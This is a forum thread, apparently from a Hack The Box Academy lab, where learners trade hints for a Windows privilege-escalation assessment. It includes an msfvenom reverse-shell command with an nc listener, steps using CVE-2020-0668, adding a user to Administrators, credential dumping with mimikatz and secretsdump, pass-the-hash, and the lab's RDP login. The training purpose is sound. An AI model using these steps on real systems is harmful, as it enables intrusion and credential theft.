Escalate privileges to SYSTEM and submit the contents of the flag.txt file on the Administrator Desktop . Trying From A long time | Tried Many Exploits Noting Seems To Work.
Any Hint.
Ok, so just read this if you are really really trapped and since nobody was replying.
To get privilege escalation there is section that explains how to use CVE-2020-0668
Since I was not able to âbuildâ the â.exeâ file from the source, what I just did was downloading the .exe files provided in the section machine that explains that CVE into my Linux Machine, re-spawn the Skill Assesment Part II machine and pass the .exe files. You can easily do this sharing the â/tmpâ folder from our attacker machine with the Windows target machine Network using
xfreerdp /v:<target-ip> /u:htb-student /p:'HTB_@cademy_stdnt!' /drive:linux,/tmp
so you have a âsharedâ folder between our Linux attacker machine and Windows target machine.
You can follow the steps as the Academy teaches.
However, when you try to get Meterpreter reverse shell, at least for me, I got the following error when I use commands:
[-] Error running command getuid: Rex::TimeoutError Send timed out
So, for this reason, instead of generating a malicious binary that uses Meterpreter, just do the old fashion way and create a simple .exe reverse shell with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp lhost=<your attacker ip> lport=<your listening port> -f exe > ma****.exe
and, before starting the âinfectedâ service, just remember to run nc:
nc -lvnp <listening port>
To get the system network user password (which could be used in other circumstances to pivoting), you have two options:
- Use mimikatz.exe
- Using our privileged reverse shell, add our user to Administrators group (ânet localgroup Administrators htb-student /addâ), use secretsdump.py (do NOT use âjust-dcâ flags) and crack the hashes with your favorite tool
Happy hacking
7 Likes
oh sory guys, i already finish the assessment II while above. above text is hint that others ask me before
the steps given to accomplish the task given by @GunZF0x are fair enough and precise⌠please if you can further elaborate the issue you are facing
Yes follow these steps and get the executable from the previous module it will make your life easier. Also msfconsole has a module but it doesnt work for some reason in this lab so dont waste time with it 
Just my 2 cents on this exercise:
Thanks so much! This has saved me a good chunk of time⌠It feels like theyâve added these skill assessments to mess with us and get us thinking outside the box. Itâs a bit much sometimes
1 Like
The first question to find the cleartext password for the iamtheadministrator account was the hardest for me.
There is good advice in here on how to do it. WinPEAs or SharpUp.exe will get you to where you need to go.
But it wonât put it right in your face. You may need to look in something.
Anyway, this was a good lab and a great example of why you shouldnât just leave passwords *cough * unattended * cough * 
1 Like
The method mentioned above, is A way to go about the box, but is not the intended way. The intended way IS MUCH easier than youâre making it. Hindsight is 2020 because it took me an entire day to figure it out.
When you run SharpUp.exe, you have everything you need to solve this.
Hint: POWERUP doesnât work on this box. But it is very easily searchable on how to exploit the vulnerability which is staring you right in the face.
1 Like
Thatâs the best way to go about it
thanks for the note. This helped me a lot.
Hallo, Iâve been able to escalate privilege using [CVE-2020-0668] and complete the module, but I realized, that once I have the reverse shell established using meterpreter, It works only few seconds. That allowed me effectively run one or two commands. But after few seconds, the remote console stoped responding and alerted with timeout. I had to establish it again, but only for those few seconds. This was enough to complete the module, but is here somebody who faced similar issue and advise how to solve it?
does this also work for the netlab module
There are multiple ways to pwn this machine. But iâm pretty sure the intended has to do with âElevationâ.
The exploit can be automated using metasploit. Try running the Suggester Module and youâll figure it out from there.
I faced the same error but after reading your post I realized that I used wrong payloads in Metasploit: windows/x64/meterpreter/reverse_shell instead of windows/x64/meterpreter/reverse_https
Using correct one gives me a brilliant shell
How did you build .sln in vs code to create the payload?
Hello please i try all way no solution, can u help me please ?
i need help for the first question please i try all way but not see it
The content of section Credential Hunting may assist with you with that.
Please give me a hint
I donât understand the last question.
There is 1 disabled local admin user on this system with a weak password that may be used to access other systems in the network and is worth reporting to the client. After escalating privileges retrieve the NTLM hash for this user and crack it offline. Submit the cleartext password for this account.
I have already escalated privileges using MSI, dumped the SAM, re-obtained SYSTEM privileges using Pass-the-Hash, and executed mimikatz, but I donât know where to get the NTLM hash. LNK phishing for NTLMv2?
Anyway why is HTB asking us to crack the NTLM hash when we already have SYSTEM privileges?